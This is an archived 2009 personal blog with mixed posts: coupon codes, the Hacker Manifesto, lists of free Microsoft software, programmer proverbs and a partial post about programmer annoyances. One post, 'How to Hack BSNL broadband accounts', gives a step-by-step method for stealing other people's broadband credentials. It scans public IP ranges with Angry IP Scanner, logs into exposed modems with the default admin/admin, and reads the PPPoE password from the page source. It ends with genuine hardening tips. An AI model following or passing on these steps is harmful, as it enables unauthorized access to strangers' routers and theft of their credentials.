Unleashing The POWER Within

We are moving!!

2009-09-20T13:07:00.002+05:30

I am really thankful to all my readers who stayed with me for so long.This is to inform you all that we soon will be moving!!
Change is what in this world is permanent and some changes are needed to make things better.

I have booked the domain ankitkumaragarwal.com (please bookmark it) and the site is already in construction. Hope to see you There.
Thanks
Ankit

And here is the rest of it.

Hostgator coupons

2009-08-28T09:41:00.005+05:30

HOSTGATOR COUPONS!!! LOST OF THEM..TRY HOSTGATOR FOR $0.01

Coupon Discount
Save BIG at HostGator with a Coupon

HostGator Coupons has the most comprehensive list of HostGator coupon codes available. Every coupon was collected from various sources around the net. We've already done the searching for you! Use any coupon to save money with HostGator web hosting!!
hgc25 $9.94 Off
cnet $9.94 Off
GAMERZ $9.94 Off
top10 $9.94 Off
sa101 $9.94 Off
freetrial $9.94 Off
tophost $9.94 Off
Green 20% OFF
Sign Up Now!

check all details before signing

How to Hack BSNL brod band aacounts?

2009-05-27T12:42:00.002+05:30

Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.

Bsnl DataOne Broadband continues to grow as one the most popular broadband services in India with high speed facilities of upto 2 mpbs. But a large number of users of this service are vulnerable to hacker attacks because discovering and hacking the vulnerable victims of this network is shockingly simple. If you are a Bsnl Broadband user then immediately assess the security of your internet connection and take appropriate steps to secure yourself.

First lets see how simple it is to hack bsnl dataone broadband usernames and passwords. For this you shall need a ipscanner tool called Angry IP Scanner http://www.angryziber.com/ipscan/ or anything similar.

Ok so lets begin... Get your IP from :
www.ipmango.com

Step 1 : Start Angry IP scanner and goto options > ports. Type in 80 in the first ports textbox and click ok.
Then goto options > options ; in the display section select "only open ports" and click ok&save.

Now on the main screen put in the ip scan range as something 59.*.0.0 - 59.*.255.255 (for e.g. 59.95.2.3) and click the start button. And the list that shall follow next are the victims. In this example we choose the range 59.95.0.0 - 59.95.255.255. You will be surprised at the number of victims you discover.

Step 2 : Pick the ip-address of any of them and open up your browser and type in http://59.*.*.* (the * should be replaced by the values from the ip you are using. A box will popup asking for username and password. Enter the username : admin and password : admin .There is a high chance that you will be able to login with that username and password.
admin-admin is the default username and password that is set while manufacturing the adsl modem devices.

What follows next is the modem administration panel.
Simply search for the "WAN" option and click it. On the next page you will find the username and password of that user. now right-click on the page and click view source. in Mozilla/Opera This frame -> view frame source

Now in the source code search for this : INPUT TYPE="PASSWORD"

and the value field of this input element will have the password

if its not there as in case of D-Link DSL 502T ADSL Routers the search for this

input type="hidden" name="connection0:pppoe:settings/password" value="password" id="uiPostPppoePassword"

and the value field will have the password
Well each steps take less than 1 minute so getting username passwords wont take even 2 minutes and is easier than sending a mail.

And this exposes the weak security of bsnl broadband users.

Well this is not a weakness but more of a mis-configuration which leads to insecurity. If you understand networking then you would probably realise that it was merely logging into the remote administration service of the modem and nothing else. This was not really hacking but a simple search of victims who are absolutely ignorant of their weak security on the internet.

Most routers have an option where remote management can be disabled. In other words, you can only connect to the configuration interface from the internal network, not the WAN(Internet) side. You would definitely want to make sure remote management is not active to protect yourself.

Note : On SmartAX MT880 eventhough Remote Management is disabled , it permits remote logins from over the Internet. So change your mode administration passwords immediately.

The problem is that the professionals at Bsnl are ignorant of such simplicity of networking and unable to advise the users or guide them to take proper security measures leaving their customers and themselves absolutely unsecure.

Now lets check a few more options related to this issue. A bsnl broadband modem can be used in two modes. RFC Bridged mode and pppoe mode.

In the RFC Bridged mode the device behaves like a modem device that is attached to your computer and you use some dialup software to dial into the isp through this modem.This is PPPOE from the PC and the adsl device is a good modem. This mode is safer as the username password are on your pc and nothing is on the modem.

In the PPPOE mode the adsl device becomes a router - a distinct network device with many features enabled. In this mode the username password is stored in the modem which will dial to the isp and establish the internet connectivity. The computers will just connect to this router who would be their primary gateway. Now this is the mode where the risk exists.

If remote administration is enabled the remote users from the internet can login to this modems administration panel. Now the main problem is the default admin username-password which most users dont change due to ignorance. "admin-admin" is pair that works in most cases giving you full access to the modems internals. What follows next is simple as drinking a glass of orange juice.

Many users install firewalls and think they are safe, but they fail to understand that the firewall protects their PC not the "router" since the topology is like

(PC) -> router -> internet

So how should you secure yourself ?

1. Use RFC Bridged mode if it is sufficient for you.

2. Change the default admin password of your modem.

3. Disable wan ping reply . ( this will prevent the hackers from directly discovering your pc when it is on the internet)

4. Disable remote configuration feature.

5. Check your broadband usage on a regular basis and compare it with your own surfing schedules to check whether someone else has used it or not. If suspiscious usage is indicated then immediately change your bband password as well. Or a better suggestion would be to change broadband passwords on a regular basis.

Try to spread the security awareness to your friends and other relatives who are using Bsnl broadband and encourage them to secure their internet connectivity.

Disclaimer : The information provided above is for educational purpose only. The main purpose of the author is to spread awareness amongst users. The author is not responsible for any misuse of the information and discourages any illegal use of it.

The hacker manifesto

2009-04-21T23:02:00.002+05:30
Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", Hacker Arrested after Bank Tampering"...

Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?

I am a hacker, enter my world...

Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...

Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."

Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here...

Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...

Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.

note:-this was origianlly written by +++The Mentor+++
Written January 8, 1986
here the hacker usually represnets a black hat hacker

FREE DOWNLOADS FROM MICROSOFT-2

2009-04-12T11:36:00.000+05:30
This post is continued from the first list which you can find here.
If you like the list dont forget to leave a comment!!
enjoy!!

MULTIMEDIA

CD Slide Show Generator can view images burned to a CD as a slide show.

"Decades" Auto Playlist Pack include dozens new auto playlists to organize your music by decades—from the 1940s through the new millennium.

Device Manager Software Development Kit (SDK) works with devices that support the new Media Transfer Protocol (MTP).

Easy Camera Calibration Tool determines a camera’s internal parameters (focal length, aspect ratio, radial distortion, etc.). The technique only requires the camera to observe a planar pattern shown at a few (at least two) different orientations. Either the camera or the planar pattern can be freely moved. The motion need not be known. (Support: Website)

GroupShot creates a composite image from a series of photos. The photos must be of the same scene, taken from the same point of view within a short period of time. (Support: Help, Website & Channel 9 Video)

HTML Slide Show Wizard creates an HTML slide show of your digital pictures.

Image Resizer resizes one or many image files with a right-click. (Support: How to . . .)

JetStream Image Editor with cut and paste tool, based on sequential curve growing with interaction. (Support: Website)

Media Audio 9 Lossless to PCM Converter - command line tool converts files encoded using Windows Media Audio 9 Lossless back into the original PCM WAV format.

Media Bonus Pack: utilities, PowerToys, visualizations, skins, sound effects, and much more. (Net Install Version)

Media Capture capture uncompressed AVI video files with mono, stereo, 5.1, or 7.1 channels of audio, with up to 24 bit resolution and sampling rates up to 192KHz.

Media Encoder provides support for high-quality multichannel sound, high-definition video quality, new support for mixed-mode voice and music content, and more. (Support: Introduction to . . .)

Media Encoder Studio Edition for video professionals, focused on the creation of high-quality, offline encoded content.

Media Mono to Multichannel Wave Combiner 9 Series - command line tool will combine 2, 6 or 8 mono WAV files into an audio-only AVI file that can be used as a source with the Windows Media Encoder 9 Series.

Media Player Software Development Kit (SDK) introduces a range of new features and functionality for customizing the Player and Player Control.

Media Professional Exhibitor intended for playback at full-screen resolution at all times. All transport and playlist controls appear on a (required) second monitor allowing for a theatrical viewing experience.

Media Transfer Protocol Porting Kit introduces the new Media Transfer Protocol (MTP), which enables you to manage content on any portable device.

Movie Maker create, edit, and share home movies easily with drag-and-drops. [Fun Packs: Winter 2002 & 2003 - Creative Audio, Titles, Custom Effects and Transitions] (Support: Blog Posting)

Photo Info allows photographers to add, change and delete common "metadata" properties for digital photographs from inside Windows Explorer. (Support: FAQ)

Paint.Net originated as a Computer Science senior design project at Washington State University, and is still developed by the two alumni Rick Brewster and Tom Jackson who now work for Microsoft. Don't forget the Free Paint.Net Plug-Ins!

Photo Story create slideshows using your digital photos. With a single click, you can touch-up, crop, or rotate pictures. Add stunning special effects, soundtracks, and your own voice narration to your photo stories.

Producer 2003 for users of PowerPoint 2002 & 2003, includes improved audio and video quality, better synchronization, and presentation-sharing tools.

RAW Image Thumbnailer and Viewer for serious photographers. Organize and work with digital RAW files in Windows Explorer, providing thumbnails, previews, printing, and metadata display for RAW images. (Support: White Paper)

TweakMediaPlayer gives access to advanced settings for the library, CD burning, and full-screen mode. Adjust music queuing in the library, automatic volume leveling for burning audio CDs, full-screen animations, and much more.

Video Cube loads an AVI movie file as a volume, and play back the movie sampling space and time in different ways. It also provides a single cutting plane for interactively viewing single spacetime slices of the video. (Support: Video Cubisum)

GAMING

3 Degrees connects people into a small group, so you can do fun things together. Throw animations to each others' desktops with winks. Listen together to a shared playlist created from music that you own with musicmix.

Carioca Rummy Card Game is a fun form of Contract Rummy popular in Argentina and Chile.

Game Voice Share Talk strategy to your teammates. Talk trash to your opponents. Game Voice brings the power of voice to games, whether you're online, on a LAN, or offline. (Support: How to . . .)

Match-Up! Similar to the game "Concentration", test your memory and matching skills while racing against the clock.

SafeDisc – When running a restricted user account with fast user switching under Windows XP, some games will not start correctly. The game requests that the original disk be placed in the drive, even if it is already present.

XBox 360 Controller & Wireless Gaming Receiver for Windows XP & Windows Vista & Windows XP 64 & Windows Vista 64 (Support: Documentation)

All Microsoft Free Game Demos

HARDWARE

Fingerprint Reader - DigitalPersona Password Manager 2.0 (Support: How to . . .)

Keyboard - IntelliType 6.1 for Windows XP & Windows Vista and Windows XP 64 & Windows Vista 64

Mouse & Trackball - IntelliPoint 6.1 for Windows XP & Windows Vista, Windows XP 64 & Windows Vista 64 (Support: How to . . . ) -- New Habu Mice

Webcams - LifeCam 1.21 for Windows XP & Windows Vista

SCREENSAVERS & THEMES

4 the Dogs (Patas) - Four themes with "mans best friend."

BlueScreen of Death Screen Saver (BSOD) Who say's Microsoft doesn't have a sense of humor?

Brazilian Beaches (Praias do Brasil) - Four of Brazil's famous beaches: Florianopolis, Buzios, Jericoacoara e Fernando de Noronha.

Brazilian Carnival Three types of parties according to regions: Olinda, Salvador and Rio de Janeiro.

Chinese New Year Theme Pack 2006.

Christmas Theme.

Creativity Fun Pack PowerToys automatically select images for your Desktop or Screen Saver.

Danish Spring & Summer themes by photographers from the Nordic countries.

Desktop Wallpapers from Microsoft Employees: Michael Swanson & Mikhail Arkhipov's 1920 x 1200 (16:10 aspect ratio "widescreen") and 1600 x 1200 (4:3 aspect ratio "standard"), Peggi Goodwin's Gorgeous Nature Images (various resolution) and three from the Exchange Server Team.

Dungeon Siege Screensaver from the magical Land of Ehb.

Egypt Nile Theme.

European Union Flags Screensaver.

Final Fantasy XI Desktop Theme.

Flight Simulator X Screensaver

Historical Monuments of Québec Theme.

Holiday Snowflakes Screensaver.

Ireland Desktop Theme by Fáilte Ireland and the Northern Ireland Tourist Board.

Italian Pasta Theme Pack.

The Lord of the Rings: The Battle for Middle Earth Skin for Windows Media Player 10 The skin was created in partnership with Electronic Arts and designed by The Skins Factory.

MSN Screensaver personalize your screensaver with background photos, news and weather information from MSN or any RSS feeds from websites you choose.

Nunavut (Canadian Arctic Region) - Desktop Theme

New Zealand Bliss A special Queen's Birthday 2005 edition (Preview Samples)

Office Dinosaur Screensaver. Share the Microsoft Office Dino's pain as he dances his way through one embarrassing technological difficulty after another.

Ontario Canada - Desktop Theme

Plus! Dancer LE enables you to experience the fun of entertaining dancers that groove to beats of the music that's playing on your desktop.

Cobey See Cobey get down to Hip Hop!
Evan & Michele Spice up your desktop with the sexy Argentinean tango.
Scooby-Doo See Scooby-Doo do the Scooby Shuffle!

Portuguese Discoveries Theme Pack produced in cooperation with Protugal's National Library - Ministry of Culture.
Ree Ree Khao Sarn, the traditional Thai children's game includes colorful wallpaper,icons and animated screensaver with sound, demonstrating children play.

Royale Noir: "Secret" internal Microsoft XP Theme.

San Fermín Desktop Theme is specifically designed for the Spanish speaking community.

Security Screensavers two screen savers remind us of basic security practices -- Ten Immutable Laws of Security, & Ten Immutable Laws of Security Administration.

Thème Québec.

TimeDimension Screensaver futuristic "clock" by Brazilian designer Hans Donner

Valentine's Day Screensaver celebrates (duh) Valentine's Day.

Video Screensaver includes sample movie footage of countries all over the world.

Windows XP Screensaver.

Windows Vista Theme for Windows XP.

Winter Fun Pack 2004 for Windows XP Installer.

Winter 2006 TechNet Scripting Games Screensaver.

World of Warcraft Skin for Media Player 10 - Blizzard's official World of Warcraft skin.

Xbox Screensavers, Desktops & Media Player skins.

Zune Desktop Theme.

FREE DOWNLOADS FROM MICROSOFT

2009-04-11T11:27:00.000+05:30
Microsoft has large range of free software around 150...i am trying to list here as many as possible...so enjoy!!
you might want to check out my previous thread of free downloadable softs here.

WINDOWS XP GOODIES

Agent components provide animated characters (Genie,

Merlin, Peedy, Robby & "Custom") to appear during specific help or instruction. (Support FAQ)

Alt-Tab Replacement in addition to the icon of the application window you are switching to, you see a preview of the page.

Calculator Plus also performs many types of conversions.

ConferenceXP enables you to see & hear others in a virtual collaborative space, called a venue. You collaborate on an electronic whiteboard or PowerPoint presentation, send messages and more.

Feeds Plus is an Internet Explorer 7 add-on for RSS pop-up notifications.

FolderShare keeps important files at your fingertips - anywhere. All file changes are automatically synchronized between linked computers, so you always access the latest files.

GroupBar desktop tool offers enhanced window management capabilities in a taskbar-like setting. Through simple drag-and-drop operations on window tiles within the bar, users can create lightweight, transient grouping relationships that allow them to perform certain higher-level window layout functions on multiple windows at once.

Location Finder turns a regular WiFi enabled laptop, Tablet or PC into a location determining device without the addition of any separate hardware. Location Finder uses WiFi access points - or reverse IP lookup when WiFi is not available - to center and display the person's location on the Windows Live Local.

MapCruncher converts existing maps into an online format that’s easy to use as Virtual Earth. PDF and raster maps can be converted just by clicking on corresponding landmarks on the user's map. (Support: Website)

My Font Tool converts your handwriting into a TrueType font, making typed text appear written by hand.

Open Command Window Here adds an "Open Command Window Here" context menu option on file system folders, giving a quick way to open a command window.

Power Calculator graphd and evaluated functions as well as performs many conversions.

Scalable Fabric task management system. A central focus area, defined by you, contains windows that behave in the traditional way. When you drag a window into the periphery, it becomes smaller and continues to get smaller the closer you get to the edge of the screen. This makes it possible to keep windows open all the time, and change "minimize" to mean "return to the periphery". (Support: Website)

Snip IT can email selected text within Internet Explorer.

Taskbar Magnifier magnifies part of the screen from the taskbar.

TIME ZONES: There are two programs that help deal with multiple Time Zones: Premium Time Zone requires genuine Windows XP, the Standard Time Zone program does not. (Support: Working with Time Zones)

Tweak UI gives access to system settings not exposed in the default user interface, including mouse settings, Explorer settings, taskbar settings, and more.

USB Flash Drive Manager backup & restore files to/from a USB Flash Drive device.

Virtual Desktop Manager manages up to four desktops from the Windows taskbar

Virtual Machine is Microsoft's Java Virtual Machine for Internet Explorer, allowing you to view java applets on Web pages.

Webcam Timershot takes and saves pictures at specified time intervals from a Webcam.

Windows Live Writer blogging authoring tool

XML Notepad 2007 provides browsing and editing XML documents. (Support: Design Doc)

XML Paper Specification Essentials Pack enables you to view, generate and index XPS Documents.

ZoomIt is screen zoom and annotation tool for technical presentations that include application demonstrations.

EBOOKS READER

eBooks Reader offers digital versions of printed books using ClearType technology.

Optional Reference & Dictionaries

Encarta Pocket Reference

Foreign Language Translations
English --> French
French --> English

English --> German
German --> English

English --> Italian
Italian --> English

English --> Spanish
Spanish --> English

Text-to-Speech Packages
English
French
German

UTILITIES

ActiveSync synchronization of Outlook information, Office docs, pics, music, videos and applications from your desktop to Windows Mobile-based Pocket PCs & Smartphones.

Clear Cache Feature for Internet Explorer – automatically deletes all temporary Internet files, cookies, and history files. This was developed to programmatically clear these files when a corrupt entry caused errors with Internet Explorer.

ClearType Tuner fine tunes the ClearType technology via the Control Panel, making it easier to read text on your screen. A necessity for LCD screens (portables and flat screens) -- Or try it On-Line. [Bonus = Consolas ClearType Font Pack]

Color Control Panel Applet adds a new "Color" item to the control panel, providing viewing and editing color management settings.

Desktop Language Settings changes language, keyboard, and regional settings for Windows, Internet Explorer, and Office.

Desktop Search 4 helps you to find, preview, and use your documents, e-mail, music, photos, and other items.

Internet Explorer History Protocol Handler Add-in indexes the history of the web pages you have browsed using Internet Explorer. (Support KB918998)
UNC/FAT Protocol Handler Add-in indexes your shared network directories and FAT drive(s) allowing you to easily find your specific content. (Support KB918996)

Font Properties Extension adds several new property tabs to the fonts dialog box. (Support: Website)

ISO Recorder Power Toy makes images of CDs & DVDs to create ISO images.

Keyboard Layout Creator create & modify keyboard layouts.

MSN Search Toolbar software and components.

Mount ISO Files Virtually - this tool allows ISO image files to be mounted virtually as a CD/DVD device.

RoboCopy GUI - GUI for Command Line Utility ROBOCOPY

SequoiaView - Treemap visualization of hard drive’s contents. (Utilityapproved by the PowerToys group)

SyncToy helps copy, move, and synchronize files with digital cameras, e-mail, cell phones, portable media players, camcorders, PDAs, and laptops. (Support: How to . . .)

System Configuration Utility (msconfig) has been updated with a Tools Tab. The System Configuration utility automates the routine troubleshooting steps used when diagnosing system configuration issues. (Support: How to MSCONFIG & How to perform advanced clean-boot troubleshooting)

Terminals is a "tabbed" terminal services/remote desktop client used for controlling multiple connection simultaneously.

Transliteration Utility (TU) tool for transliterating one natural language script to another (like Serbian Latin to Serbian Cyrillic or Latin to Inuktitut). Plus, it can be used to create, edit, debug, and test natural language transliteration modules used to convert one script to another. (Support: How to . . .)

Tweakomatic utility that writes Windows Management Instrumentation (WMI) scripts enablimg you to retrieve and/or configure Windows and Internet Explorer settings locally or remotely.

User State Migration Tool (USMT) migrates user files and settings during large deployments by capturing desktop, network and application settings as well as a user files, and then migrates them to a new Windows installation. (Support: Homepage)

Virtual PC is a powerful software virtualization solution that allows running multiple PC-based operating systems simultaneously on one workstation. (Support: Technical Overview)

VirtualWiFi abstracts a single WLAN card to appear as multiple virtual WLAN cards to the user. The user can then configure each virtual card to connect to a different wireless network. Therefore, VirtualWiFi allows a user to simultaneously connect his machine to multiple wireless networks using just one WLAN card.

Windows SteadyState is designed for schools, libraries, Internet Cafés, and other public locations.

Wntipcfg This GUI tool gives you information about your IP configuration.

SUPPORT & TROUBLESHOOTING

Bootvis – Microsoft states this tool is not available, but they still “support it”. Bootvis “was” a performance tracing and visualization tool designed to help identify performance issues for boot/resume timing while developing new PC products or supporting software.

Change Analysis Diagnostic tracks Windows OS changes

COMDisable tool, views, disable or enable a list of available COM ports.

DebugView monitors kernel-mode and Win32 debug output on your local or networked TCP/IP computer.

Desktop Heap Monitor examines usage of a WIN32 subsystem that has an internal heap area known as "desktop heap". When running large number of programs, "Out Of Memory" error messages appear when you attempt to start new programs or try to use programs that are already running, even though you still have plenty of physical and pagefile memory available. (Support: KB126952)

DiskMon logs and displays all hard disk activity.

DLL Online Help Database – helps identify DLL version conflicts.

Fiddler is an HTTP Debugging Proxy which logs all HTTP traffic between your computer and the Internet. Fiddler allows you to inspect all HTTP Traffic, set breakpoints, and "fiddle" with incoming or outgoing data. (Support: HTTP Debugging)

Guided Help (depending on the problem) can automatically guide you through various steps to perform some diagnostic tasks yourself. (Support: How to . . .)

Kernel Memory Space Analyzer helps expert debugging engineers analyze crash dump files.

MDAC Component Checker helps you determine installed version information and diagnose installation issues with the Microsoft Data Access Components (Support: MDAC Website)

Memory Diagnostic tests the Random Access Memory (RAM) on your computer for errors. (Support: Users Guide)

Network Diagnostics for Windows XP tool (xpnetdiag) analyzes information about your network connectivity to help troubleshoot common connection problems. (Support: KB914440)

Portmon monitors and displays all serial and parallel port activity on a system. Advanced filtering and search capabilities make it a powerful tool for tracking down problems in system or application configurations.

PortQry Command Line Port Scanner is a command-line utility that troubleshoots TCP/IP connectivity issues by reporting the port status of TCP and UDP ports on a computer you choose. For details, see KB310099 and description. (Description of Microsoft Port Numbers & All Port Numbers)

Port Reporter logs TCP and UDP port activity on a local Windows system by running as a service logging which ports are used, which process is using the port, if the process is a service, which modules the process has loaded and which user account is running the process. (Description of Microsoft Port Numbers & All Port Numbers)

Port Reporter Parser Tool is a log parser for Port Reporter log files. Port Reporter Parser has many features that can help you analyze Port Reporter log files.

Process Explorer shows information about which handles and DLLs processes have opened or loaded.

Process Monitor shows real-time file system, Registry and process/thread activity.

Product Support's Reporting Tools and Premier Services Reporting Utility (Alliance version) facilitates the gathering of critical system and logging information used in troubleshooting support issues. There are 8 specialty versions, one for each of the following support scenario categories: Alliance, Directory Services (not for NT 4.0), Networking, Clustering, SQL, Software Update Services, MDAC and Base / Setup / Storage / Print / Performance. (Support: Blog Article & Overview)

Sysinternals Troubleshooting Utilities zipped into a single file containing the individual troubleshooting tools and help files.

User Mode Process Dumper (userdump) dumps any running Win32 processes memory image (including system processes such as csrss.exe, winlogon.exe, services.exe, etc) on the fly, without attaching a debugger, or terminating target processes. Generated dump file can be analyzed or debugged by using the standard debugging tools.

User Profile Deletion Utility (Delprof) deletes all data that is stored in a user profile including desktop settings, favorites, program-specific data that is contained in the Application Data folder, and the contents of the My Documents folder.

User Profile Hive Cleanup helps with slow log off and unreconciled profile problems ensuring that user sessions are completely terminated when a user logs off when using Roaming Profiles or locked profiles as implemented through the Shared Computer Toolkit.

Video Decoder Checkup Utility helps determine if an MPEG-2 DVD video decoder is installed, and whether it's compatible with Media Player 10 or Media Center Edition.

Windows Installer CleanUp Utility can remove a program's configuration information if experiencing installation (Setup) problems.

Windows Support Tools are intended for use by Microsoft support personnel and experienced users to assist in diagnosing and resolving computer problems.

SECURITY, ANTI-SPYWARE & ANTI-VIRUS

Baseline Security Analyzer includes a graphical and command line interface that can perform local or remote scans of Windows systems. MBSA will scan for common security misconfigurations in the following products: Windows 2000, XP, Server 2003, IIS 5.0 & 6.0, SQL Server 7.0 & 2000, MSIE 5.01 and later, and Office 2000, 2002 & 2003. MBSA also scans for missing security updates, update rollups and service packs published to Microsoft Update. (Support Tool: Visio Connector for MBSA 2.0, MBSA Homepage)

Malicious Software Removal Tool checks for infection by specific, prevalent malicious software (including Blaster, Sasser, and Mydoom) and helps to remove the infection if it is found. (Updated on the second Tuesday of each month.)

Promqry and PromqryUI detects if a network sniffer that is running on a computer. If a system has network interfaces in promiscuous mode, it may indicate the presence of a network sniffer running on the system.

PromqryUI provides a Windows graphical interface that can be used to detect network interfaces that are running in promiscuous mode.

Promqry is a command line tool that can be used to detect network interfaces that are running in promiscuous mode.

Windows Defender protects against pop-ups, slow performance and security threats caused by spyware and other potentially unwanted software.

Windows Live Safety Center – Web service designed to ensure the health of your computer with free scanning tools helping get rid of unwanted software.

OFFICE APPLICATIONS

Office Accounting 2009

Word 5.5 for DOS - Huh?

EXPRESS EDITIONS FOR DEVELOPERS

SQL Server 2005, SQL Server 2005 with Advanced Services

Visual 2005 Web Developer

Visual Basic, C#, C++, & J#

Programmers proverbs

2009-04-10T11:17:00.003+05:30
A FEW PROGRAMMERS' PROVERBS
(COLLECTED OVER NET)

A clever person solves a problem.
A wise person avoids it.

-- Einstein

André Bensoussan once explained to me the difference between a programmer and a designer:

"If you make a general statement, a programmer says, 'Yes, but...'
while a designer says, 'Yes, and...'"

No matter what the problem is,
it's always a people problem.

Jerry Weinberg

Wexelblat's Scheduling Algorithm:

Choose two:

* Good
* Fast
* Cheap

Craziness is doing the same thing and expecting a different result.

Tom DeMarco, rephrasing Einstein, who said

Insanity: doing the same thing over and over again and expecting different results.

"There's no time to stop for gas, we're already late"

-- Karin Donker
Deming's 14 points

1. Create constancy of purpose.
2. Adopt the new philosophy.
3. Cease dependence on mass inspection to achieve quality.
4. Minimize total cost, not initial price of supplies.
5. Improve constantly the system of production and service.
6. Institute training on the job.
7. Institute leadership.
8. Drive out fear.
9. Break down barriers between departments.
10. Eliminate slogans, exhortations, and numerical targets.
11. Eliminate work standards (quotas) and management by objective.
12. Remove barriers that rob workers, engineers, and managers of their right to pride of workmanship.
13. Institute a vigorous program of education and self-improvement.
14. Put everyone in the company to work to accomplish the transformation.

We know about as much about software quality problems as they knew about the Black Plague in the 1600s. We've seen the victims' agonies and helped burn the corpses. We don't know what causes it; we don't really know if there is only one disease. We just suffer -- and keep pouring our sewage into our water supply.

-- Tom Van Vleck
The Troops Know

* The schedule doesn't have enough time for maintenance in it.
* A lot of bugs get past the tests.
* Most old code can't be maintained.

To go faster, slow down. Everybody who knows about orbital mechanics understands that.

-- Scott Cherf
Everybody Knows:

* Discipline is the best tool.
* Design first, then code.
* Don't patch bugs out, rewrite them out.
* Don't test bugs out, design them out.

Everybody Knows:

* If you don't understand it, you can't program it.
* If you didn't measure it, you didn't do it.

Everybody Knows:

If something is worth doing once, it's worth building a tool to do it.

Your problem is another's solution;
Your solution will be his problem.
Everybody Knows:

* If you've found 3 bugs in a program, best estimate is that there are 3 more.
* 60% of product cost comes after initial shipment.

The significant problems we face cannot be solved by the same level of thinking that created them.

-- Albert Einstein

On the radio the other night, Jimmy Connors said the best advice he ever got was from Bobby Riggs:

* do it
* do it right
* do it right now

It is not enough to do your best: you must know what to do, and THEN do your best.

-- W. Edwards Deming

A leader is best when people barely know that he exists.
Less good when they obey and acclaim him.
Worse when they fear and despise him.
Fail to honor people, and they fail to honor you.
But of a good leader, when his work is done, his aim fulfilled,
they will say, "We did this ourselves."

-- Lao-Tzu

You must be the change
You wish to see in the world

-- Gandhi

Experiment escorts us last,
His pungent company
Will not allow an axiom
An opportunity.

-- Emily Dickinson

when the cart stops
do you whip the cart
or whip the ox?

Q: How many QA testers does it take to change a lightbulb?
A: QA testers don't change anything. They just report that it's dark.

Kerry Zallar

Q: How many software engineers does it take to change a lightbulb?
A: Just one. But the house falls down.

Andrew Siwko

One test is worth a thousand opinions.

"If you didn't write it down, it didn't happen."

This saying is popular among scientists (doing experiments), but I believe it applies to software testing, particularly for real-time systems.

--Larry Zana

We reject kings, presidents, and voting.
We believe in rough consensus and running code.

--Dave Clark (1992)

I am a design chauvinist. I believe that good design is magical and not to be lightly tinkered with. The difference between a great design and a lousy one is in the meshing of the thousand details that either fit or don't, and the spirit of the passionate intellect that has tied them together, or tried. That's why programming---or buying software---on the basis of "lists of features" is a doomed and misguided effort. The features can be thrown together, as in a garbage can, or carefully laid together and interwoven in elegant unification, as in APL, or the Forth language, or the game of chess.

-- Ted Nelson

Software is Too Important to be Left to Programmers, by Meilir Page-Jones.

"If you think good architecture is expensive, try bad architecture."

-- Brian Foote and Joseph Yoder

Abraham Lincoln reportedly said that, given eight hours to chop down a tree, he'd spend six sharpening his axe.

-- TidBITS 654, quoted by Derek K. Miller, via Art Evans

... while we all know that unmastered complexity is at the root of the misery, we do not know what degree of simplicity can be obtained, nor to what extent the intrinsic complexity of the whole design has to show up in the interfaces. We simply do not know yet the limits of disentanglement. We do not know yet whether intrinsic intricacy can be distinguished from accidental intricacy.

-- E. W. Dijkstra, Communications of the ACM, Mar 2001, Vol. 44, No. 3

You can only find truth with logic if you have already found truth without it.

-- Gilbert Keith Chesterton (1874-1936) " The Man who was Orthodox", via Paul Black
And here is the rest of it.

10 things that annoy programmers

2009-03-08T21:57:00.003+05:30

10. Comments that explain the "how" but not the "why"

Introductory-level programming courses teach students to comment early and comment often. The idea is that it's better to have too many comments than to have too few. Unfortunately, many programmers seem to take this as a personal challenge to comment every single line of code. This is why you will often see something like this code snippit taken from Jeff Atwood's post on Coding Without Comments:

[code:c#]

r = n / 2; // Set r to n divided by 2

// Loop while r - (n/r) is greater than t
while ( abs( r - (n/r) ) > t ) {
r = 0.5 * ( r + (n/r) ); // Set r to half of r + (n/r)
}

[/code]

Do you have any idea what this code does? Me neither. The problem is that while there are plenty of comments describing what the code is doing, there are none describing why it's doing it.

Now, consider the same code with a different commenting methodology:

[code:c#]

// square root of n with Newton-Raphson approximation
r = n / 2;

while ( abs( r - (n/r) ) > t ) {
r = 0.5 * ( r + (n/r) );
}

[/code]

Much better! We still might not understand exactly what's going on here, but at least we have a starting point.

Comments are supposed to help the reader understand the code, not the syntax. It's a fair assumption that the reader has a basic understanding of how a for loop works; there's no need to add comments such as "// iterate over a list of customers". What the reader is not going to be familiar with is why your code works and why you chose to write it the way you did.

9. Interruptions

Very few programmers can go from 0 to code at the drop of a hat. In general, we tend to be more akin to locomotives than ferraris; it may take us awhile to get started, but once we hit our stride we can get an impressive amount of work done. Unfortunately, it's very hard to get into a programming zone when your train of thought is constantly being derailed by clients, managers, and fellow programmers.

There is simply too much information we need to keep in mind while we're working on a task to be able to drop the task, handle another issue, then pick up the task without missing a beat. Interruptions kill our train of thought and getting it back is often a time-consuming, frustrating, and worst of all, error-prone process.

8. Scope creep

From Wikipedia:
